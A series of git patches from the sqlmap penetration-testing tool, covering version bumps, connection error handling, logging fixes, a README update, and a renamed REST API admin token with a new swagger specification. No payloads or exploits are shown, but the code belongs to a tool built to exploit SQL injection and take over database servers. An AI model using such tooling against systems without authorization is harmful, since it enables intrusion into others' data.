+7665ca2a2c406933422d52553d40eded lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -ad5f9980c9bdca753578292720a5afe0 sqlmap.py +fa713ca1dc1983f3cb3d90e76a05819a sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From e99e9919cdf3dd533759bfc243ef65e631ffa16d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 2 Nov 2018 15:44:44 +0100 Subject: [PATCH 353/428] Update related to the #3356 --- lib/core/common.py | 2 ++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index e2421394860..d762b531fc3 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1407,6 +1407,8 @@ def parseTargetDirect(): __import__("pyodbc") elif dbmsName == DBMS.FIREBIRD: __import__("kinterbasdb") + except (SqlmapSyntaxException, SqlmapMissingDependence): + raise except: if _sqlalchemy and data[3] in _sqlalchemy.dialects.__all__: pass diff --git a/lib/core/settings.py b/lib/core/settings.py index f98366e13b8..8e7f92ae121 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.2" +VERSION = "1.2.11.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4f7da47b721..2efd9ac6307 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -56c793e54bcd3292a397288ba6ab5f35 lib/core/common.py +b2a70451b0e5abe914aff2130015664f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7665ca2a2c406933422d52553d40eded lib/core/settings.py +8f0fae6a47aed35b82f320edfec67ce2 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From 90e381a5a5388251fbb10abbddb783606f06a893 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 2 Nov 2018 16:18:08 +0100 Subject: [PATCH 354/428] Another update related to the #3356 --- lib/controller/handler.py | 36 ++++++++++++++++++--------- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- lib/utils/hashdb.py | 4 +-- plugins/dbms/mssqlserver/connector.py | 2 +- txt/checksum.md5 | 10 ++++---- 6 files changed, 34 insertions(+), 22 deletions(-) diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 9dab40488e6..bb05e11024b 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -10,6 +10,7 @@ from lib.core.data import kb from lib.core.dicts import DBMS_DICT from lib.core.enums import DBMS +from lib.core.exception import SqlmapConnectionException from lib.core.settings import MSSQL_ALIASES from lib.core.settings import MYSQL_ALIASES from lib.core.settings import ORACLE_ALIASES @@ -94,21 +95,32 @@ def setHandler(): conf.dbmsConnector = Connector() if conf.direct: + exception = None dialect = DBMS_DICT[dbms][3] if dialect: - sqlalchemy = SQLAlchemy(dialect=dialect) - sqlalchemy.connect() - - if sqlalchemy.connector: - conf.dbmsConnector = sqlalchemy - else: - try: - conf.dbmsConnector.connect() - except NameError: - pass - else: - conf.dbmsConnector.connect() + try: + sqlalchemy = SQLAlchemy(dialect=dialect) + sqlalchemy.connect() + + if sqlalchemy.connector: + conf.dbmsConnector = sqlalchemy + except Exception, ex: + exception = ex + + if not dialect or exception: + try: + conf.dbmsConnector.connect() + except Exception, ex: + if exception: + raise exception + else: + if not isinstance(ex, NameError): + raise + else: + msg = "support for direct connection to '%s' is not available. " % dbms + msg += "Please rerun with '--dependencies'" + raise SqlmapConnectionException(msg) if conf.forceDbms == dbms or handler.checkDbms(): if kb.resolutionDbms: diff --git a/lib/core/common.py b/lib/core/common.py index d762b531fc3..8da52c896d9 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1410,7 +1410,7 @@ def parseTargetDirect(): except (SqlmapSyntaxException, SqlmapMissingDependence): raise except: - if _sqlalchemy and data[3] in _sqlalchemy.dialects.__all__: + if _sqlalchemy and data[3] and any(_ in _sqlalchemy.dialects.__all__ for _ in (data[3], data[3].split('+')[0])): pass else: errMsg = "sqlmap requires '%s' third-party library " % data[1] diff --git a/lib/core/settings.py b/lib/core/settings.py index 8e7f92ae121..c2d56b5bef9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.3" +VERSION = "1.2.11.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index 95ce6bbce5d..b3f77358b8b 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -91,7 +91,7 @@ def retrieve(self, key, unserialize=False): raise except sqlite3.DatabaseError, ex: errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, getSafeExString(ex)) - errMsg += "If the problem persists please rerun with `--flush-session`" + errMsg += "If the problem persists please rerun with '--flush-session'" raise SqlmapConnectionException(errMsg) else: break @@ -104,7 +104,7 @@ def retrieve(self, key, unserialize=False): except: retVal = None warnMsg = "error occurred while unserializing value for session key '%s'. " % key - warnMsg += "If the problem persists please rerun with `--flush-session`" + warnMsg += "If the problem persists please rerun with '--flush-session'" logger.warn(warnMsg) return retVal diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index 997a69cd040..a39d05d9366 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -41,7 +41,7 @@ def connect(self): try: self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except (pymssql.Error, _mssql.MssqlDatabaseException), msg: + except (pymssql2.Error, _mssql.MssqlDatabaseException), msg: raise SqlmapConnectionException(msg) except ValueError: raise SqlmapConnectionException diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2efd9ac6307..a49ee603570 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -25,11 +25,11 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 71334197c7ed28167cd66c17b2c21844 lib/controller/checks.py dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py -97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py +ba2717a410b21285d781ab42c4a797d0 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -b2a70451b0e5abe914aff2130015664f lib/core/common.py +eb4e54c194d50d9dc8caa1a3ea69cba6 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8f0fae6a47aed35b82f320edfec67ce2 lib/core/settings.py +46698dfe7954891919d27a2f250d8f42 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -107,7 +107,7 @@ f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py -062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py +1205648d55649accafae2cc77d647aa0 lib/utils/hashdb.py d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py @@ -169,7 +169,7 @@ ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py -decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py +5e1c7e578d07f3670bba5d88d856715d plugins/dbms/mssqlserver/connector.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py 65911fdc86fa6322e72319e6488a0bb8 plugins/dbms/mssqlserver/filesystem.py 6cf74341fc84588205e02b70b2f0f5b6 plugins/dbms/mssqlserver/fingerprint.py From e6535d359dfaedf241df0e6bcf1115774b305e7e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 4 Nov 2018 14:17:53 +0100 Subject: [PATCH 355/428] Update related to the #3358 --- lib/core/settings.py | 2 +- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c2d56b5bef9..a56c74ce66c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.4" +VERSION = "1.2.11.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 762b461cf70..53cf065bdcc 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -591,7 +591,7 @@ class _(dict): threadData.lastHTTPError = (threadData.lastRequestUID, code, status) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 - responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status) + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()]) @@ -750,7 +750,7 @@ class _(dict): responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status) else: - responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status) + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()]) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a49ee603570..1033b1d71ec 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -46698dfe7954891919d27a2f250d8f42 lib/core/settings.py +9bea28956f348af193325c45ee992dda lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -0363fb0b3e58467ff5c915d1d85dfd3e lib/request/connect.py +3c53af24cc2ffb1895f253fbefb66efd lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From ddf353b86e78f395f3ad615e5adf771045cdfecd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 4 Nov 2018 14:36:38 +0100 Subject: [PATCH 356/428] Fixes #3357 --- lib/core/settings.py | 2 +- plugins/generic/connector.py | 8 +++++--- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a56c74ce66c..fb7609b1886 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.5" +VERSION = "1.2.11.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py index 3676f570724..c23593f7b66 100644 --- a/plugins/generic/connector.py +++ b/plugins/generic/connector.py @@ -20,6 +20,7 @@ class Connector: def __init__(self): self.connector = None self.cursor = None + self.hostname = None def initConnection(self): self.user = conf.dbmsUser or "" @@ -34,9 +35,10 @@ def printConnected(self): logger.info(infoMsg) def closed(self): - infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) - infoMsg += ":%d closed" % self.port - logger.info(infoMsg) + if self.hostname: + infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) + infoMsg += ":%d closed" % self.port + logger.info(infoMsg) self.connector = None self.cursor = None diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1033b1d71ec..5d3bb063304 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9bea28956f348af193325c45ee992dda lib/core/settings.py +7e344a320c695a16b3c52d53f7c06006 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -211,7 +211,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py -34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py +bdc159cc5afb28cadd980c01c43ba669 plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py 3d75e831574c750ed58e24eaa562c056 plugins/generic/databases.py 35546acab0eea406c23b84363df4d534 plugins/generic/entries.py From 6cc52cc12ab04f419b520dd452f7ce0a73ceda7f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 12 Nov 2018 14:07:41 +0100 Subject: [PATCH 357/428] Fixes #3366 --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index fb7609b1886..9084bfef20d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.6" +VERSION = "1.2.11.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 53cf065bdcc..1a6c4e580f7 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -957,7 +957,7 @@ def _adjustParameter(paramString, parameter, newValue): retVal = paramString match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString) if match: - retVal = re.sub(re.escape(match.group(0)), "%s=%s" % (parameter, newValue), paramString) + retVal = re.sub(re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString) else: match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString) if match: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5d3bb063304..b0fee54978e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7e344a320c695a16b3c52d53f7c06006 lib/core/settings.py +2ec7d2bc8a0e0c387488c41c0cd44f51 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -3c53af24cc2ffb1895f253fbefb66efd lib/request/connect.py +9bfc067165e82afc0b271f777850ad30 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From b1e8c75672a2f7aa4d35092791baa210bd17d7d9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Nov 2018 12:59:40 +0100 Subject: [PATCH 358/428] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 94555641904..ae75b0e606d 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # sqlmap -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. From 2895e5c20f6585da905e345e657c362ea0baec39 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Nov 2018 15:27:05 +0100 Subject: [PATCH 359/428] Initial commit for #3140 --- lib/core/settings.py | 2 +- lib/utils/api.py | 43 +++++----- swagger.yaml | 188 +++++++++++++++++++++++++++++++++++++++++++ txt/checksum.md5 | 4 +- 4 files changed, 214 insertions(+), 23 deletions(-) create mode 100644 swagger.yaml diff --git a/lib/core/settings.py b/lib/core/settings.py index 9084bfef20d..f40b3687282 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.7" +VERSION = "1.2.11.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index 4d6316eeda4..7a7229ca579 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -58,7 +58,7 @@ # Global data storage class DataStore(object): - admin_id = "" + admin_token = "" current_db = None tasks = dict() username = None @@ -275,8 +275,8 @@ def setRestAPILog(): logger.addHandler(LOGGER_RECORDER) # Generic functions -def is_admin(taskid): - return DataStore.admin_id == taskid +def is_admin(token): + return DataStore.admin_token == token @hook('before_request') def check_authentication(): @@ -358,7 +358,7 @@ def path_401(): @get("/task/new") def task_new(): """ - Create new task ID + Create a new task """ taskid = hexencode(os.urandom(8)) remote_addr = request.remote_addr @@ -371,7 +371,7 @@ def task_new(): @get("/task//delete") def task_delete(taskid): """ - Delete own task ID + Delete an existing task """ if taskid in DataStore.tasks: DataStore.tasks.pop(taskid) @@ -379,39 +379,42 @@ def task_delete(taskid): logger.debug("[%s] Deleted task" % taskid) return jsonize({"success": True}) else: - logger.warning("[%s] Invalid task ID provided to task_delete()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) + response.status = 404 + logger.warning("[%s] Non-existing task ID provided to task_delete()" % taskid) + return jsonize({"success": False, "message": "Non-existing task ID"}) ################### # Admin functions # ################### -@get("/admin//list") -def task_list(taskid=None): +@get("/admin/list") +@get("/admin//list") +def task_list(token=None): """ - List task pull + Pull task list """ tasks = {} for key in DataStore.tasks: - if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: + if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: tasks[key] = dejsonize(scan_status(key))["status"] - logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + logger.debug("[%s] Listed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) -@get("/admin//flush") -def task_flush(taskid): +@get("/admin/flush") +@get("/admin//flush") +def task_flush(token=None): """ Flush task spool (delete all tasks) """ for key in list(DataStore.tasks): - if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: + if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: DataStore.tasks[key].engine_kill() del DataStore.tasks[key] - logger.debug("[%s] Flushed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + logger.debug("[%s] Flushed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) return jsonize({"success": True}) ################################## @@ -647,7 +650,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST REST-JSON API server """ - DataStore.admin_id = hexencode(os.urandom(16)) + DataStore.admin_token = hexencode(os.urandom(16)) DataStore.username = username DataStore.password = password @@ -660,7 +663,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST port = s.getsockname()[1] logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) - logger.info("Admin ID: %s" % DataStore.admin_id) + logger.info("Admin (secret) token: %s" % DataStore.admin_token) logger.debug("IPC database: '%s'" % Database.filepath) # Initialize IPC database @@ -696,7 +699,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST logger.critical(errMsg) def _client(url, options=None): - logger.debug("Calling %s" % url) + logger.debug("Calling '%s'" % url) try: data = None if options is not None: @@ -833,7 +836,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non logger.info("Switching to task ID '%s' " % taskid) elif command in ("list", "flush"): - raw = _client("%s/admin/%s/%s" % (addr, taskid or 0, command)) + raw = _client("%s/admin/%s" % (addr, command)) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command %s" % command) diff --git a/swagger.yaml b/swagger.yaml new file mode 100644 index 00000000000..3f00bf4d8cd --- /dev/null +++ b/swagger.yaml @@ -0,0 +1,188 @@ +swagger: "2.0" +info: + description: "" + version: "1.2" + title: "sqlmap API (REST-JSON)" + contact: + email: "dev@sqlmap.org" + license: + name: "GPL 2.0" + url: "https://www.gnu.org/licenses/old-licenses/gpl-2.0.html" +host: "0.0.0.0:8775" +basePath: "/" +tags: +- name: "task" + description: "Task management functions" +- name: "admin" + description: "Task administration functions" +- name: "option" + description: "Task option handling functions" +schemes: +- "http" +paths: + /task/new: + get: + tags: + - "task" + summary: "Create a new task" + description: "" + operationId: "taskNew" + produces: + - "application/json" + parameters: [] + responses: + 200: + description: "Task successfully created" + schema: + type: object + properties: + success: + type: boolean + taskid: + type: string + example: "7e605b5d5a892b74" + /task/{taskid}/delete: + get: + tags: + - "task" + summary: "Delete an existing task" + description: "" + operationId: "taskDelete" + produces: + - "application/json" + parameters: + - name: "taskid" + in: "path" + description: "ID of an existing task to delete" + required: true + type: "string" + responses: + 200: + description: "Task successfully deleted" + schema: + type: object + properties: + success: + type: boolean + enum: [true] + 404: + description: "Task ID not found" + schema: + type: object + properties: + success: + type: boolean + enum: [false] + message: + type: string + enum: ["Non-existing task ID"] + /admin/list: + get: + tags: + - "admin" + summary: "Pull task list (locally)" + description: "Note: Use in cases when connecting to server from same IP (e.g. `localhost`)" + operationId: "adminList" + produces: + - "application/json" + responses: + 200: + description: "Task list successfully pulled" + schema: + type: object + properties: + success: + type: boolean + enum: [true] + tasks: + type: object + additionalProperties: + type: string + example: + 16a7a898e8eaaf45: running + 644fc063408e4f12: not running + 8e2eb10770d913cd: not running + d59d1c69bdc06933: not running + tasks_num: + type: integer + example: 4 + /admin/{token}/list: + get: + tags: + - "admin" + summary: "Pull task list (remotely)" + description: "Note: Use in cases when connecting to server from different IP" + operationId: "adminListToken" + produces: + - "application/json" + parameters: + - name: "token" + in: "path" + description: "Secret token (Note: written to console during a server run - e.g. `2756d5b6e7d093ba49b5fd06a93aca7a`)" + required: true + type: "string" + responses: + 200: + description: "Task list successfully pulled" + schema: + type: object + properties: + success: + type: boolean + enum: [true] + tasks: + type: object + additionalProperties: + type: string + example: + 5c911efa476b55f4: not running + 5ee038e153ffc534: not running + e58c7a4de6bf7f51: not running + tasks_num: + type: integer + example: 4 + /admin/flush: + get: + tags: + - "admin" + summary: "Flush task pool (locally)" + description: "Note: Use in cases when connecting to server from same IP (e.g. `localhost`)" + operationId: 